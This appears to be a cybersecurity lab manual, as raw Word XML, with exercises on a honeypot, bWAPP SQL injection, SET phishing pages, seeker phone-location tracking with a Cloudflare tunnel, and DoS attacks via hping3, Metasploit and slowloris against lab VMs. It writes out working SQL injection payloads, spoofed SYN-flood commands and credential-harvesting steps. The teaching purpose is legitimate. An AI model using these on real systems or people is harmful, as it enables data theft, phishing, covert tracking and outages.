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Exercise 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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270" w:right="0" w:hanging="27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Write about the google dorks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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40" w:right="0" w:hanging="27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Write the steps to grab the cookies in the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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540" w:right="0" w:hanging="27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Write the functionalities of some sites like osint framework pentestgpt.com, tempmailo.com,  scihub whatismyipaddress.com in short.</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Exercise 2</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Aim:-  Setup a honey pot and monitor the honey pot on network using Kali Linux.</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Steps to follow</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Kali Linux with user name password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use Pentbox honey pot for this purpose.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pentbox honeypot in browser. Choose Github clone version for the lab sessions.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the github clone link for accessing honeypot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Link is </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">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https://github.com/technicaldada/pentbox.git</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Kali Terminal and type &gt;&gt; git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">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https://github.com/technicaldada/pentbox.git</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all the packages are downloading.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download is complete go to pentbox 1.8 folder (cd pentbox 1.8)</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ls . It will display all the files and folders in the pentbox 1.8 folder.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also find one tar file named pentbox.tar.gz. Untar it with the following command &gt;&gt; tar xvzf pentbox.tar.gz</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files will be downloaded.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downloading go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pentbox-1.8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folder with cd command again type ls command to check the folder contents. You will find pentbox.rb.</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the file with ./pentbox.rb command.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display all the tools it in. Select option 2 – Network Tools, select option 3-Honeypots.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Select option 1- Fast Auto Configuaration.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set up the honeypot automatically. Now observe for the suspicious activity at the honeypot.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observe it, open another terminal and type ifconfig to check own IP address.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new browser and type the same IP address in the address bar.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browser you will get some out. But if u observe the pentbox terminal you will get the following output.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222222"/>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INTRUSION ATTEMPT DETECTED! from </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">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10.0.2.15:55454</w:t>
        </w:r>
      </w:hyperlink>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 (2024-07-10 13:40:53 +0530)</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GET / HTTP/1.1</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Host: 10.0.2.15</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User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0</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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</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Accept-Language: en-US,en;q=0.5</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Accept-Encoding: gzip, deflate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Connection: keep-alive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222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1</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 the honeypot by typing (ctrl+c)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set up the honeypot manually by following steps 12 and 13.</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option 2- set up honeypot manually.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Insert port to open – type 80/23</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Insert false message to show – type “hi”.</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net 2 options type n and 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get “ Your honey pot id activated at port 23”</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test it , open another terminal and type the nmap command as &gt;&gt;nmap –p23 10.0.2.15.</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show that port 23 is open at the give IP address.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the command &gt;&gt; nc –nv  10.0.2.15 23</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see that intrusion detection is detected  in pentbox terminal.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Monitor the ssh connection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monitor the ssh connection, first we need to setup ssh connection in Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup and Configure SSH in Kali Linux</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SSH is used remotely login into the system.</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we want to remotely login into kali, kali need to be set to use bridged adapter in network settings. Switch on kali and follow the steps at the terminal.</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the ssh in kali as follows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update // to update</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apt install openssh-server // to install ssh server</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start ssh //start ssh server</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enable ssh //enable ssh on bootup</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status ssh //check the status of ssh</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sudo systemctl restart ssh //restart the ssh services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to remote access kali from windows host, we can use putty as client.</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putty from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https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html</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putty x86 64 bit version.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putty and type 192.168.1.3(IP address of Kali in Bridged adapter mode) at the destination address.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45599" cy="1989655"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="20748" l="33482" r="33784" t="19706"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1945599" cy="19896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the pair and we will the following screen</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set up the honeypot manually by following steps 12 and 13 from above steps.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option 2- set up honeypot manually.</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Insert port to open – type 23</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net 2 options type n and y.</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get “ Your honey pot id activated at port 23”</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putty and and connect to kali using port 23 (instead of port 22).</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honeypot will show that “some intrusion is there at the ssh/telnet shell.</w:t>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Exercise 3</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Write a script or code to demonstrate SQL injection attacks.</w:t>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Lab setup for various injection attacks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Download and install wampserver from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 wampserver.com/en/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it is showing some errors then some of the vc++ redistribution files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we can download it from </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">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Wampserver - Files and addons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Download the zip file, extract it and install all the files one by one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installation of all the redistribution files, install the wampserver.</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installed check if it is working or not. Its icon must be shown as green color.</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Download the bwapp.zip file from </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">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https://sourceforge.net/projects/bwapp/</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Extract it into folder.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Inside copy c:/bwapp/bwapp folder and paste into C:\wamp64\www</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C:\Users\LCS\Downloads\bWAPPv2.2\bWAPP\admin\settings.php file in notepad, search set db_password =’ ‘.</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Restart the wamp services .</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restarted, go to browser and type localhost/bwapp/install</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give the install page, but when we try to install,  it will give some error at line 40.</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fix this error, we will open C:\wamp64\www\bWAPP\install.php and at line 29 add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mysqli_report(MYSQLI_REPORT_OFF);</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Refresh the page in the browser and it will install bwapp in the wamp</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will display bwapp installed successdfully.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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise 1:- bwapp sql injection get/search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps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we select this option from the dropdown list, we may get error. According to the error we have to do corrections in the C:\wamp64\www\bWAPP\connect.php file as follows.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 all mysql commands to mysqli commands as follows</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$link = mysqli_connect($server, $username, $password, $database);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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die("Could not connect to the server: " . mysqli_error());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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$database = mysqli_select_db($link,$database);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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die("Could not connect to the database: " . mysqli_error()); </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this we will be directed to the following web page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2952115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3568065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="467360" cy="10160"/>
                <wp:effectExtent b="8890" l="0" r="8890" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr>
                        <a:cxnSpLocks/>
                      </wps:cNvCnPr>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4673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2952115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3568065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="476250" cy="19050"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>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6250" cy="1905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we try to search for movie, again it may give error. So make changes in the C:\wamp64\www\bWAPP\sqli_1.php file as follows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$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) .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    $recordset = mysqli_query($link,$sql)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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&lt;td colspan="5" width="580"&gt;&lt;?php die("Error:mysqli_error()); ?&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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if(mysqli_num_rows($recordset) != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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while($row = mysqli_fetch_array($recordset))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mysqli_close($link);</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these corrections, we get the following screen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we enter spider, we get some listing. But when we enter, spiderman, we get “ no movies found”</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we give some injection characters like ‘or1 or – or -and check. Here we will check by typing spider1’  -- - in the search box.</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url it is showing as ‘http://localhost/bwapp/sqli_1.php?title=spider1%27+--+-&amp;action=search’</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hence we conclude that the string 1’ -- - is breaking the sql query in our case. And it is shown as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we find out about how many columns does it have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the search box </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type ‘spider1' order by 5 --</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -‘ . here it does not show any error. It just show no movies found. Then try with 6,7,8. When we enter 8, it will give error. So here we conclude that, in our db we have 7 cols.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we find, what are those columns, by typing ‘spi1' union select 1,2,3,4,5,6,7 -- -‘ in the search bar and we will get the following screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5037283" cy="2831857"/>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37283" cy="283185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will get the database with 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p1' union select 1,database(),3,4,5,6,7 --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search bar. And we will get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find the version by typing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union select 1,database(),version(),4,5,6,7 --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we will get the version.</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we find all the table names by typing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sp1' union select 1,table_name,3,4,5,6,7 from information_schema.tables--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search box.it will give the following screen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will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out the columns in the table as follows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sp1' union select 1,2,3,4,group_concat(column_name SEPARATOR ','),6,7 from information_schema.columns where table_name='movies'--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sp1' union select 1,2,3,4,group_concat(column_name SEPARATOR ','),6,7 from information_schema.columns where table_name='users'--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the above query in the search box</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give the output as follows. We will get all the columns in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4137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get the contents of the table, we inject in the following way in the search bar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sp1' union select 1,2,3,4,group_concat(id,title),6,7 from movies -- -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we will get all the table data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xz51h77njiap" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a social networking website login page using phishing techniques.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we will see social engineering attacks. Here we will create fake SE webpages like facebook, linkedin or others and send to the victim. When the victim access that fake page, we can trap his/her credentials.</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SE toolkit by clicking at the left top corner (All applications)</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Social Engineering tools-&gt;Social Engineering toolkit and enter password</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menu select 1 (Social Engineering attacks)</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types select 2(Website Attack Vectors)</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menu select 3 (credentials harvestor  attack method)</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select 1 (Web Templates)</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IP Address which is displayed there (10.0.2.15).</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2 or 3( google or twitter)</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it will create fake page for google/twitter at 10.0.2.15.</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by opening the site in the browser.</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credentials like username and password.</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entered username and password are trapped in the console.</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different SE attacks and record.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Trace the mobile location of the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used :- seeker, cloudflared, hound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps for seeker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seeker from github. Search for seeker in github , copy the code.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kali terminal, type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 clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/thewhiteh4t/seeker.git</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download the seeker</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check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should give seeker folder. Go to seeker folder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$cd seeker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seeker folder,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will get seeker.py file.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 this with the cmd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$geet/seeker&gt;python3 seeker.py</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start seeker application. Select any option 0-7 (lets say u choose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watsapp)</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the group name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Gifts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the group icon path (download and png file in KL and give that path)</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/home/geet/Downloads/giftbox.png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give port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8080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server will start</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wait for client’s action.</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can open it in our own browser by typing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localhost:8080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address bar.</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can get the entire  mobile location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cmd promt. Copy the url and open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 maps.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will get the target phone location.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cloudflare tool </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Cloudflare Tunnel :- Allows users to create a locally-managed tunnel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be installed as a system service on Linux</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be used to preview local projects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Cloudflare tunnel is used to create the link of the application on the local machine to be used in the internet and external link</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google search bar type github cloudflare releases.</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site and navigate to the releases list.</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Scrolldown and under Assets section locate for cloudflare-linux-amd64  link.</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 press on it and we will get the download link.</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download link, go to terminal and type $wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cloudflare/cloudflared/releases/download/2025.1.1/cloudflared-linux-amd64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download the cloudflare tool.</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 it can’t be used as command.</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to make it as command type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$chmod +x cloudflare-linux-amd64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will convert it into command</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type the command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$.\cloudflared-linux-amd64 tunnel  - url locahost:8080</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5</w:t>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Write a code to demonstrate DoS attacks.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 Attack :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 Cyber attack where perpetrator seeks to make a machine or network resource unavailable to its intented users by temporarily or indefinitely disrupting services of a host connected to the network. It is an attack used to deny legitimate users access to a resource such as accessing a website, emails etc or making it extremely slow. There is one source and 1 target system.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 is accomplished by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flooding the target system with many request to overload it and prevent some of the legitimate requests from being fulfilled.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DDoS attack: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There are many systems which send the requests to single target system.Multiple systems flood the available bandwith. Such an attack is the result of multiple compromised systems for eg. Botnet.</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For this, we will download and install metasploitable 2 machine in the virtual machine as follows.</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Metasplotable 2 machine is a vulnerable tool and is used for ethical hacking purpose.</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Download the </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">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https://sourceforge.net/projects/metasploitable/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will download zip file. Extract it into some folder.</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folder for Metasploitable 2 file of virtual machine disk format file of around 1880704Kb. </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virtual box and click on new.</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the values as follows</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machine :- meta (anything)</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Browse to the folder </w:t>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linux.</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Debian 64</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Leave storage setting as it is and click next </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existing virtual machine disk file option and browse for the vmdf in our folder.</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install the metasploitable 2.</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in the virtual box go to settings-Network as select host-only adapter option and virtua-box host only adapter as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option. </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Then start the machine.</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Username and password are msfadmin and msfadmin for metasploitable 2.</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ifconfig. Note the inet address. In our case it is 192.168.56.101.</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completes the metasplotable 2 installation.</w:t>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Next go the Kali Linux, open firefox browser and type </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.56.101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It will open metasplotable 2 webpage in the browser. You can browse to DVWA Link. It will show the DVWA Web Page.</w:t>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We can observe the traffic using wireshark.</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For this, Go to Kali applications and select </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sniffing  and spoofing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select eth0 and start capturing the packets and observe the traffic.</w:t>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Next we launch the DoS attack using hping3 as follows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One terminal in Kali and enter root login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&gt;&gt;sudo su</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 kali password</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root console type the command in the following way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&gt;&gt;hping3 –S 192.168.56.101(metasploitable 2 IP address) –a 192.168.56.200 (Our spoofed IP address) –p 80(open port) - - flood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launch the synflood on the metasplotable 2 machine)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observe the traffic in wireshark.  We can see traffic grows enormously after this command is executed.</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 If we try to open metasplotable 2 machine, we cannot open as it is under DoS attack now.</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stop the attack by pressing ctrl+C/Z/X</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2nd way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Kalilinux, open terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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msfconsole (it will open msfconsole).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Metasploit and find out the ipaddress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$ifconfig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kalilinux, at the msfconsole, type $search syn flood</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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give the exploits of  Metasploit exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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$use 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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go to the exploits namespace as msf6 auxiliary(dos/tcp/synflood)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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msf6 auxiliary(dos/tcp/synflood)&gt;show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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the options as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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msf6 auxiliary(dos/tcp/synflood)&gt;set RHOSTS 10.16.0.92 (target ip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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msf6 auxiliary(dos/tcp/synflood)&gt;set SHOSTS 10.16.0.95 (spoofed ip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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msf6 auxiliary(dos/tcp/synflood)&gt;run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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the traffic using wireshark and also from the browser. When we try to open it, it will not open.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5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Stop the attack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ctrl+c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way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slowloris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tool to launch dos attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">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Download it from github . copy the link from github as </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">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https://github.com/gkbrk/slowloris.git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clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://github.com/gkbrk/slowloris.git</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will download slowloris file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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$cd slowloris</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">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$python3 slowloris.py -p 80 -s 1200 10.16.0.95</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">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10.16.0.95 is the target machine ip address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">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the traffic using wireshark and also from the browser. When we try to open it, it will not open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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spacing w:after="200" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="18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Stop the attack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ctrl+c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ets8qqbm4x62" w:id="1"/>
      <w:bookmarkEnd w:id="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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
